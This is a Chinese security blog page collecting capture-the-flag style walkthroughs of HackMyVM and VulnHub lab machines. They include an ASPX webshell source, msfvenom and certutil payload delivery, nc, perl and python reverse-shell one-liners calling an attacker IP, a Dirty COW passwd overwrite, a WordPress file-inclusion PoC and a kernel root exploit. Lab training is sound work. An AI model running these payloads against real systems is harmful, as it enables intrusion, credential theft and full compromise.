首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
11,115 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,847 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
5,318 阅读
4
几个常见的密码字典推荐
4,647 阅读
5
全网最全渗透测试靶场推荐【2026最新靶场推荐】,拒绝信息差
4,517 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
189
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
71
篇与
的结果
2025-10-27
HackMyVm-Simple :简单
4.1 信息打点端口扫描web界面,通过界面可能存在的系统用户如下ruy, marcos, lander, bogo, vaiper4.2 nxc服务爆破把上面的几个用户,追加到一个字典中,并使用这些用户作为密码进行爆破或者使用rokyou.txtnxc SMB 192.168.0.139 -u user -p user nxc SMB 192.168.0.139 -u user -p /usr/share/wordlists/rokyou.txt发现是紫色的提示,翻译一下错误就能发现,这密码过期了,需要登录到虚拟机上修改这个账号的密码4.3 近源攻击按esc进入用户列表,选择bogo用户:输入正确的密码bogo后,需要你修改密码尝试执行命令,一切正常4.4 SMB渗透再来到SMB登录这块,就能正常登录了再LOGS共享文件中发现了一个日志文件,使用get命令将它下载下来尝试将之前的用户字典上传上去,使用put命令,发现没有上传权限日志内容┌──(root㉿kali)-[/data/demo] └─# cat 20231008.log PS C:\> dir \\127.0.0.1\WEB Acceso denegado At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand Cannot find path '\\127.0.0.1\WEB' because it does not exist. At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand PS C:\> net use \\127.0.0.1\WEB Se ha completado el comando correctamente. PS C:\> dir \\127.0.0.1\WEB Acceso denegado At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand Cannot find path '\\127.0.0.1\WEB' because it does not exist. At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand PS C:\> net use \\127.0.0.1\WEB /user:marcos SuperPassword Se ha completado el comando correctamente. PS C:\> dir \\127.0.0.1\WEB Directorio: \\127.0.0.1\WEB Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/8/2023 9:46 PM aspnet_client -a---- 9/26/2023 6:46 PM 703 iisstart.htm -a---- 10/8/2023 10:46 PM 158 test.php PS C:\> rm \\127.0.0.1\WEB\*.php PS C:\> dir \\127.0.0.1\WEB Directorio: \\127.0.0.1\WEB Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/8/2023 9:46 PM aspnet_client -a---- 9/26/2023 6:46 PM 703 iisstart.htm PS C:\>又得到了一个账号密码user:marcos SuperPassword这个用户也是一样,密码过期,需要重新设置一下密码,重复之前的步骤就好了尝试使用put将一个文件上传上去,上传成功!有上传的权限,那么就可以将aspx马上传上去(这里的web大概率就是网站的web目录了)4.5 获取shell尝试使用put命令上传文件cd /usr/share/webshells/aspx SMBclient //192.168.0.139/WEB/ -U marcos # 密码 SuperPassword put cmdasp.aspx访问这个马使用MSFvenom生成反弹shell的木马MSFvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=4444 -f exe -o shell.exe python3 -m http.server使用下载命令,将这个木马上传到靶机上certutil -urlcache -split -f http://192.168.0.147:8000/shell.exe c:\shell.exe # 或者利用SMBclient上传也可以,此时只需要输入一个shell.exe在那个aspx命令执行界面打开MSF启动监听use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.147 run在命令执行的aspx的输入框中输入这个shell.exe的绝对路径就可以执行,利用下面这个命令定位马的位置where /r c:\ shell.exec:\inetpub\wwwroot\shell.exe执行马4.6 MSF内核漏洞扫描bg use multi/recon/local_exploit_suggester set session 1 run尝试利用扫描出来的漏洞use windows/local/CVE_2020_0787_bits_arbitrary_file_move存在漏洞但是始终没有创建shell会话找到CVE-2020-0787的exp# 源码 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION.git # 创建好的 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/download/1/BitsArbitraryFileMoveExploit.exe此时去上传文件(这里我换了一个网,ip就变了,我用的桥接模式,使用vmbox用nat模式会出问题,导致vmware的虚拟器kali访问不到vmbox,这是最简单的解决方法)SMBclient //192.168.110.46/WEB/ -U marcos put BitsArbitraryFileMoveExploit.exe提权失败4.7 土豆提权切换提权方式土豆提权,将这些全都下载下来https://github.com/BeichenDream/GodPotato/releases/tag/V1.20可以看到这里我们执行的whoami已经是系统权限了,此时我们只需要添加一个反弹一个shell到本地来就可以了MSF反弹shellshell反弹过来后,却不是system权限,接下来要将这个木马设置为系统权限,而不是这个用户的文件,类似于Linux中的属主4.8 修改文件权限GodPotato-NET4.exe -cmd "cmd /c takeown /f c:\inetpub\wwwroot\shell.exe /a"重新反弹即可往期推荐全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 :简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月27日
1,331 阅读
0 评论
0 点赞
2025-10-27
HackMyVm-quoted :简单
2.1 信息打点web界面2.2 ftp匿名登录端口扫描,看到了可以匿名登录利用ftp匿名登录,账号ftp,密码没有,直接回车就能连接ftp服务器,发现这个ftp服务器,就是web目录,尝试使用put上传一个file.txt测试文件访问这个file文件,上传成功!2.3 获取shell我们上传一个cmdasp.aspx上去这个文件kali自带,在 /usr/share/webshells/aspx/cmdasp.aspx源码如下<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><HEAD><title>awen asp.net webshell</title></HEAD><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label></form></body></HTML><!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --><!-- http://michaeldaw.org 04/2007 -->我们找到这个1.exe,可以使用如下cmd命令进行定位,MSF注意监听,即可反弹过来where /r c:\ shell.exe # 查找在c盘指定文件的位置2.4 MSF内核漏扫在meteroreter模块中使用bg命令,将这个会话运行在后台,使用本地提权扫描模块,设置好相关的配置启动扫描,这个靶机有10个提权漏洞10个提权payload 只有exploit/windows/local/ms16_075_reflection_juicy这个模块使用成功往期推荐全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 :简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月27日
1,163 阅读
0 评论
0 点赞
2025-10-15
vuln靶机-GoldenEye1.1,OSCP必刷靶机
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/首先我们使用arp-scan -l进行内网主机探测使用nmap对靶机进行端口探测打开web80端口提示我们需要进入/sev-home/这个目录下面进行登录显然这是一个401验证下面出现了一个编码的password,还有一个用户BorisInvincibleHack3r看样子是html编码,解码试试,得到结果InvincibleHack3r我们用这个已知的用户进行登录,第一次大写的Boris登录失败,这里需要使用小写的boris,就能登录成功啦这里有一个提示就是pop3服务器运行在一个非常高的端口上,我们查看源代码的时候需要一直往下翻,找到两个用户分别是Natalya,Boris将可能的用户加入到这个字典开始爆破hydra -L ./user.txt -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt -s 55007 10.10.10.134 pop3 -vV -t 10爆破成功一个用户我们使用nc连接目标地址(根据提示说pop3服务器在高端口),使用账号密码登录进去,有两封信第二封信包含了一个账号密码还有让我们修改hostsWindows路径:C:\Windows\System32\drivers\etc\hosts修改/etc/hosts后,这里就能得到一个cms访问severnaya-station.com/gnocertdir地址:继续点一点,发现要登陆,使用邮件获得的用户密码进行登陆用户名:xenia 密码:RCP90rulez!Home / ▶ My profile / ▶ Messages --->发现有一封邮件,内容发现用户名doak爆破用户名doak的邮件,获得用户名密码:doak/goatecho doak > GodenEye.txt ---将用户名写入txt文本中hydra -L GodenEye.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.134 -s 55007 pop3登录doak用户查看邮件信息邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。用户名:dr_doak密码:4England!使用新的账户密码登录CMS登录后在:Home / ▶ My home 右边发现: s3cret.txt 另外发现这是Moodle使用的2.2.3版本现在我们查看文件的内容,指出管理员凭据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容。查看这个图片将图像下载到本地,使用strings进行分析,当然也可以使用exiftool图片分析工具wget http://severnaya-station.com/dir007key/for-007.jpg用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==xWinter1995x!使用获得的信息进行登录用户名:GoldenEye密码:xWinter1995x!severnaya-station.com/gnocertdir线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序,切换到admin用户登录即可成功将代码替换到Path to aspellip改为攻击机ip,然后点击Save changes接着在kali上监听1234端口,然后找到Home / ▶ My profile / ▶ Blogs / ▶ Add a new entry,点击下图3的位置反弹shell提示了一个错误,说未发现拼写错误那么多尝试几个反弹shell的命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.130 1234 >/tmp/fperl -e 'use Socket;$i="10.10.10.130";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.130",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'直到使用python使用FeatherScanwget 10.10.10.130:8000/FeatherScan.shchmod +x FeatherScan.sh./FeatherScan.sh来看看有没有可以利用的suid文件并且可能存在藏牛提权那么我们尝试使用藏牛进行提权,使用openssl生成一个密码然后将github下载下来的藏牛脚本移动到靶机上,并进行编译我们检查一下这个系统有没有gcc和cc,是没有gcc的我们可以使用cc命令,这里编译报错不用管,不影响脚本使用随后写一个passwd标准用户,到一个临时passwd文件中,利用藏牛脚本进行提权,就没有任何回应了,可能添加成功了,但是需要重启靶机,而且再次点击那个ABC按钮进行反弹shell也不会成功,所以判断不了是否添加成功,那么就是失败echo "xiaoyu:$1$abc$mJPQCTATLDV5aNzcHMYLr/:0:0::/root:/bin/bash" > /tmp/passwd./exp1 /etc/passwd "$(cat /tmp/passwd)"重启靶机重新反弹shell,再看看有没有内核漏洞使用FeatherScan.sh查看完整的系统信息searchsploit ubuntu 3.13 14.04 Privilege看到一个合适的,直接复制下来检查一下有没有用到gcc的,因为靶机不能用gcc然后我们需要修改这个gcc为cc命令然后从kali中下载这个exp,编译并执行,报错没关系,提权还是能正常提权的全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月15日
1,186 阅读
0 评论
0 点赞
2025-08-13
VulnHub-STAPLER: 1 内核&sudo提权
靶机地址:https://www.vulnhub.com/entry/stapler-1,150/靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开,或者导致网络错误我们在端口扫描的时候,就能看到FTP是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务,也就是80端口进行目录扫描curl http://10.10.10.220/.profilecurl http://10.10.10.220/.bashrc使用上面的命令可以看到这些内容(没有什么东西)接下来我们使用FTP匿名登录有一个note笔记,把它get下来查看┌──(root㉿kali)-[~]└─# FTP 10.10.10.220Connected to 10.10.10.220.220-220-|-----------------------------------------------------------------------------------------|220-| Harry, make sure to update the banner when you get a chance to show who has access here |220-|-----------------------------------------------------------------------------------------|220-220Name (10.10.10.220:kali): FTP331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.FTP> ls550 Permission denied.200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 107 Jun 03 2016 note226 Directory send OK.FTP> cd note550 Failed to change directory.FTP> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 107 Jun 03 2016 note226 Directory send OK.FTP> get notelocal: note remote: note200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note (107 bytes).100% |*********************| 107 1.03 MiB/s 00:00 ETA226 Transfer complete.107 bytes received in 00:00 (110.69 KiB/s)FTP> exit221 Goodbye.┌──(root㉿kali)-[~]└─# cat note # 查看noteElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息,我们来到12380端口的web,他报了一个400,使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin,但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息 这样子找找phpmyadmin的nday(利用过几个之后也没什么作用)我们打开目录扫描出来的robobts.txt,包含了两个目录,一个是后台界面的目录,一个是博客地址访问后台,缺弹出了一个框,看这个样子应该是被别人黑过,留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan,枚举可能存在的用户并使用这些用户名对后台进行爆破,使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:footballharry:monkeyscott:cookietim:thumb登录后台第一篇文章第二篇文章,还有第三篇文章,都没有什么用我们访问wordpress插件的目录(dirb,dirsearch都能扫出来)可以看到有三个插件来看第一个插件,他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞,额外找到了突破点我们尝试运行这个exp,报了一些错误,显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令,平时我也不怎么用,-i参数表示的是直接修改这个文件,由于url中包含了很多个/所以就换了个符号|进行分割,不然也可以使用/,s表示替换命令,最后面那个g表示全局替换,使用示例sed -i 's/原内容/新内容/g' # / 写法sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题,ssl错误,我们的靶机站点ssl错误了,不清楚怎么修改代码不要紧,我们使用他提供的poc手工打(这个漏洞脚本中有)下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url,但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址,显示了一个页面不存在的样子随后我找了半天,尝试了各种操作,在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码root : plbkac,原来访问了那个文件包含的poc,在这里会生成几张图片,二这个图片的内容就是你包含的文件的内容!curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库,目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试(同样使用文件包含漏洞,获取/etc/passwd文件内容),下面是可能的用户┌──(root㉿kali)-[/data/demo]└─# cat user.txtsyncpeterRNunemakerETollefsonDSwangerAParnellSHayslettMBassinJBareLSolumMFreiSStroudCCeaserJKanodeCJooJLippsjamieSamDrewjessSHAYTaylormelkaizoeNATHANwwwelly使用这些用户,还有数据库的密码,进行爆破(猜测数据库密码是其中任意一个用户的名字)使用ssh进行登录使用featherscan,进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan/FeatherScan_v4_5_/chmod +x FeatherScan_v4_5./FeatherScan_v4_5发现了如下漏洞信息,如果仔细辨别名称的话,这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞,毕竟工具不能代替人工,随后找到了这个exp最后面有一个exp,我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zipzoe@red:/tmp$ ls39772.zip FeatherScan searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ unzip 39772.zipArchive: 39772.zip creating: 39772/inflating: 39772/.DS_Store creating: __MACOSX/ creating: __MACOSX/39772/inflating: __MACOSX/39772/._.DS_Storeinflating: 39772/crasher.tarinflating: __MACOSX/39772/._crasher.tarinflating: 39772/exploit.tarinflating: __MACOSX/39772/._exploit.tarzoe@red:/tmp$ ls39772 39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ cd 39772zoe@red:/tmp/39772$ lscrasher.tar exploit.tarzoe@red:/tmp/39772$ tar -xvf exploit.tarebpf_mapfd_doubleput_exploit/ebpf_mapfd_doubleput_exploit/hello.cebpf_mapfd_doubleput_exploit/suidhelper.cebpf_mapfd_doubleput_exploit/compile.shebpf_mapfd_doubleput_exploit/doubleput.czoe@red:/tmp/39772$ lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tarzoe@red:/tmp/39772$ cd eebpf_mapfd_doubleput_exploit/ exploit.tarzoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput.c hello.c suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./compile.shdoubleput.c: In function ‘make_setuid’:doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" # 这里报错不要紧,不影响脚本正常编译 ^zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.whoamisuid file detected, launching rootshell...we have root privs now...root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoamiroot至此提权成功!其他思路,在home下面发现了一个sudo用户peter,而且能够使用sudo查看历史命令,发现了另外两个用户的密码,其中包含了peter!能使用sudo!那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhostsshpass -p JZQuyIN5 peter@localhost有了密码,使用sudo的时候发现sudo权限是all,那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你,致敬~往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年08月13日
1,301 阅读
0 评论
0 点赞
2025-07-18
VulnHub--GlasgowSmile-v1.1
